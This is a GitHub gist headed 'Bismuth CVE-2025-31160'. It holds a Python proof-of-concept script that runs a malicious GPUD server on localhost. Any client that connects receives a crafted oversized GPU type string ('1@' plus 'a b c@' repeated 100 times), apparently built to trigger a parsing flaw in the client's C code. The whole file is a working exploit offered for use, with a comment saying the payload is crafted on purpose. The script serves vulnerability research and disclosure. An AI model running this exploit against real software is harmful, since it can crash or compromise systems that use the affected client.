-
-
Save jkstill/8b057cc3fc9a3bb35e5a7dc34e290bd8 to your computer and use it in GitHub Desktop.
Bismuth CVE-2025-31160
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import struct | |
import threading | |
import time | |
# Default TCP port the server binds to when no port is passed to GPUDServer.
GPUDPORT = 59123

# Protocol version byte: expected as the second byte of a client request and
# placed in the top byte of the 4-byte response prelude.
APIVERSION = 1
class GPUDServer:
    """Minimal TCP server that answers GPUD "type" requests on localhost.

    A client sends two bytes (``'T'`` followed by ``APIVERSION``); the server
    replies with a 4-byte big-endian prelude (version in the top byte, payload
    length in the low 24 bits) followed by the payload returned by
    ``get_gpu_type_info()``, then closes the connection.
    """

    # How often (seconds) the accept loop wakes up to re-check ``self.running``.
    # Without a timeout, a blocked accept() would never notice stop().
    _ACCEPT_POLL_SECONDS = 0.5

    def __init__(self, port=GPUDPORT):
        """Remember the port to listen on; no socket is opened until start()."""
        self.port = port
        self.server_socket = None
        self.running = False
        # (socket, address, thread) for each connection still being handled.
        self.clients = []

    def start(self):
        """Start the GPUD server.

        Binds to 127.0.0.1 on ``self.port`` and launches a daemon thread that
        accepts connections.

        Returns:
            The started accept thread.

        Raises:
            OSError: if the listening socket cannot be set up (for example the
                port is already in use). The socket is closed before the
                error propagates.
        """
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind(('127.0.0.1', self.port))
            listener.listen(5)
            # Make accept() return periodically so the loop can observe stop().
            listener.settimeout(self._ACCEPT_POLL_SECONDS)
        except OSError:
            listener.close()
            raise
        self.server_socket = listener
        self.running = True
        print(f"GPUD Server started on port {self.port}")
        # Start accepting client connections
        accept_thread = threading.Thread(target=self.accept_connections)
        accept_thread.daemon = True
        accept_thread.start()
        return accept_thread

    def accept_connections(self):
        """Accept incoming client connections until the server is stopped.

        Each accepted connection is handed to its own daemon thread running
        ``handle_client``.
        """
        while self.running:
            try:
                client_socket, address = self.server_socket.accept()
            except socket.timeout:
                # Poll interval elapsed with no client; re-check self.running.
                continue
            except OSError as exc:
                # Expected when stop() closed the listener; report it otherwise.
                if self.running:
                    print(f"Error accepting connection: {exc}")
                break
            print(f"Client connected: {address}")
            # Start a new thread to handle this client
            client_thread = threading.Thread(
                target=self.handle_client,
                args=(client_socket, address)
            )
            client_thread.daemon = True
            try:
                client_thread.start()
            except RuntimeError as exc:
                # Could not spawn a handler: release the socket, keep serving.
                print(f"Error handling client {address}: {exc}")
                client_socket.close()
                continue
            # Drop finished connections so the list does not grow forever.
            # Only this thread rebinds self.clients; stop() iterates a copy.
            active = [entry for entry in self.clients if entry[2].is_alive()]
            active.append((client_socket, address, client_thread))
            self.clients = active

    @staticmethod
    def _recv_exact(sock, count):
        """Read up to ``count`` bytes, looping over short reads.

        Returns fewer than ``count`` bytes only if the peer closed the
        connection first.
        """
        received = bytearray()
        while len(received) < count:
            chunk = sock.recv(count - len(received))
            if not chunk:
                break
            received += chunk
        return bytes(received)

    def handle_client(self, client_socket, address):
        """Handle one client connection and always close it afterwards.

        Args:
            client_socket: connected socket returned by accept().
            address: peer address, used only in log output.
        """
        try:
            # Receive the 'T' and APIVERSION from client. A single recv(2) may
            # legally return one byte, so read until both bytes have arrived.
            request = self._recv_exact(client_socket, 2)
            print("REQ", request)
            if len(request) == 2 and request[0] == ord('T') and request[1] == APIVERSION:
                print(f"Received valid type request from {address}")
                # Encode first so the advertised length counts the bytes that
                # are actually sent, not the number of characters.
                payload = self.get_gpu_type_info().encode('utf-8')
                # Create prelude: version (1 byte) + length (3 bytes),
                # packed as one big-endian (>) uint32 (I).
                prelude = struct.pack(
                    '>I', (APIVERSION << 24) | (len(payload) & 0xFFFFFF)
                )
                # Send prelude
                client_socket.sendall(prelude)
                # Send GPU information
                client_socket.sendall(payload)
                print(f"Sent response to {address}")
            else:
                print(f"Invalid request from {address}")
        except Exception as e:
            # Thread boundary: report the failure instead of dying silently.
            print(f"Error handling client {address}: {e}")
        finally:
            client_socket.close()

    def get_gpu_type_info(self):
        """
        Generate GPU type information to send to client.
        Format should match what gputype_parse() in the C code expects.

        Returns:
            The payload as a str: "1@" followed by "a b c@" repeated 100 times.
        """
        # NOTE(review): the file header references CVE-2025-31160, so this
        # payload is presumably crafted on purpose -- do not "normalize" it.
        gpu_info = "1@" + ("a b c@" * 100)
        return gpu_info

    def stop(self):
        """Stop the server and close all connections."""
        self.running = False
        # Close all client connections (iterate a snapshot: the accept thread
        # may still be rebinding self.clients).
        for client_socket, _, _ in list(self.clients):
            try:
                client_socket.close()
            except OSError:
                # Best effort: the handler thread may already have closed it.
                pass
        # Close server socket
        if self.server_socket:
            self.server_socket.close()
        print("GPUD Server stopped")
def main():
    """Run a GPUDServer on the default port until interrupted with Ctrl+C.

    The server is always stopped on the way out, and the accept thread is
    given up to two seconds to finish.
    """
    gpud = GPUDServer()
    acceptor = gpud.start()
    try:
        # Idle in the foreground; all real work happens on the server threads.
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("Shutting down server...")
    finally:
        gpud.stop()
        acceptor.join(timeout=2)


# Script entry point: only start the server when executed directly.
if __name__ == "__main__":
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment